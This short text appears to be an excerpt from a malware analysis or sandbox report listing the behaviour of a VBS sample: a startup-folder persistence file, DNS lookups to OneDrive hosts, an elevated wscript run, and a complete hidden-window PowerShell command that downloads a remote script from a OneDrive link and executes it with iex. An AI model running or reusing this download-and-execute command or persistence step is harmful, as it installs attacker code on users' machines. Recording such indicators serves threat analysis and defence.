Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\dddd.vbs
- 'on####ve.live.com':443
- '5g####.#n.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK 5g####.#n.files.1drv.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=976A4CF3786BA4FD&resid=976A4CF3786BA4FD%21108&authkey=AHyYadbK9jLCnwY')' (with hidden window)
- '<SYSTEM32>\wscript.exe' "<PATH_SAMPLE>.vbs" /elevate
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://onedrive.live.com/download?cid=976A4CF3786BA4FD&resid=976A4CF3786BA4FD%21108&authkey=AHyYadbK9jLCnwY')